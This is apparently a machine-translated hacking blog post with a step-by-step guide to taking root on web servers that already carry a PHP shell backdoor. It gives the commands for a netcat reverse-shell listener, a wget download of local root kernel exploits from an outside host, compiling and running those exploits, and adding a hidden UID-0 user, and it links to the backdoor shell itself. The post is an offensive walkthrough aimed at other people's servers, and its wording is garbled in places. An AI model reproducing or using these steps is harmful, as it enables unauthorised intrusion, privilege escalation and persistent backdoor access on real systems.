It is needed is
- Computers & Coffee(hahaha...)
- Target sites that have been injected "shell backdoor"
- Exploit tools Localroot
- netcat
Open the php shell on the previous website was hacked and had backdoors installed "php shell"
Example: http://www.situstargetyangtelahdihack.com/path/dir/shell.php
Will look like below:
Dude Click on the image to see full-Team Size Greetings ALBoRaaQ
The next step is to make sure you know the server kernel is used, usually have no information on the "shell backdoor" in the example above, namely:
Linux 2.6.18-8.el5 somerandomhosting.com # 1 SMP Fri January 26 14:15:21 EST 2007 i686
Or you can use and run the command: uname-a
From the information above we know that the kernel is: 2.6.18-8 i686
Well, after knowing the information kernel, then steps should be done is to seek and find "LocalRoot Exploit" tool that is suitable for the above kernel. Provide localroot for this kernel: 2.6.18-8.el5 # 1 SMP Fri January 26 14:15:21 EST 2007 i686.
We're looking for here just localroot exploitnya, incidentally many listnya: localroot.th3-0utl4ws
download here
2 - BackConnecting From Server To Computer Attacker
As noted earlier, is needed in this case is:
- Netcat Tools (Must be installed on the computer)
- Open ports (ports that automatically opens)
Open netcat and run the following command, for example port to be used is 443:
C: \ WINDOWS \ system32 \ cmd.exe - nc-l-n-v-p 443
Then press the "Enter"
Later will come the message "Listening on [any] 443 ..."
After that, we return to the "shell backkdor" we have invested.
Find the function "Back Connect", then we have input the IP and port.
For example: We IP: 10.10.10.10 and port: 443, as shown below:
Dude Click on the image to see full-Team Size Greetings ALBoRaaQ
We run the command "Connect"
If successful this will appear on-screen command line we are, that means back connect successfully with success.
3 - Download & Execution Exploit Exploit
We will need localroot exploit, can be downloaded from the link that was mentioned above, as for some ways you can do is
1) Using the function "wget / cURL"
2) Can be used to upload manually from the shell
Since the server is "wget" can be done, then download localroot exploit using the function "wget".
Okay, simply copy the download link "localroot exploit the right:
Download Tools Localroot collection of Th3-0utl4ws
download the local root
To download the tools above just type the command: wget http://localroot.th3-0utl4ws.com/xploits/2.6.18-164.zip
When it is downloaded then extract the "local root tools", it could by using the command "unzip" or "untar" or "tar"
As the example above, "localroot exploit already downloaded" and ter-extract:
unzip prct1.c.zip
The next step is the exploit localroot compile, because it uses the language "C", then used the GCC command:
gcc-o PRC prct1.c
Then run:
. / PRC
Note: If it fails and an error occurs, you should use the tools "local root" exploit others. (DO NOT GIVE UP!)
The above still fails, do it again and looking for another exploit!
Unzip the file again localroot exploit others: unzip 2.6.18-164.zip
Well, localroot exploit above is very suitable for this kernel: ("2.6.18-164")
Since it was already compiled form file and was able to execute, it executed immediately & do not forget to change permissions so "777", as the following example:
chmod 777 2.6.18-164
Then run the exploit:
./2.6.18-164
To check whether we've managed to get root access, check with the following command:
id
or
whoami
You've got root access, congrat!
4 - Adding a New Root User
Adding a level with the root user access is easy, simply use the following command, for example we will add the user root access "Haxorfortutorial":
adduser-u 0-o-g 0-G 0,1,2,3,4,6,10-M Haxorfortutorial
Explanation of commands:
Quote:
adduser - linux basic commands to add user
-u 0-o - set user ID becomes a zero (0) root.
-g 0 - Set initial group with ID zero (0) root.
-G 0,1,2,3,4,6,10 - Set additional group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel
-M - 'home directory' not create the user.
Haxorfortutorial - User name of the new user account.
Note: Change the user Haxorfortutorial in accordance with the username you want, these are just examples :)
Next, do set a password for the user that we created.
The command:
passwd Haxorfortutorial
Example of implementation:
[root @ fedora ~] # passwd Haxorfortutorial
Changing password for user Haxorfortutorial.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
id Haxorfortutorial
GNY shell backdoor - http://privatepaste.com/1321f97984
Tools Netcat - http://downloadnetcat.com/nc11nt.zip
Similarly, a short tutorial how ngeroot server easily, may always succeed ngeroot! completed
No comments:
Post a Comment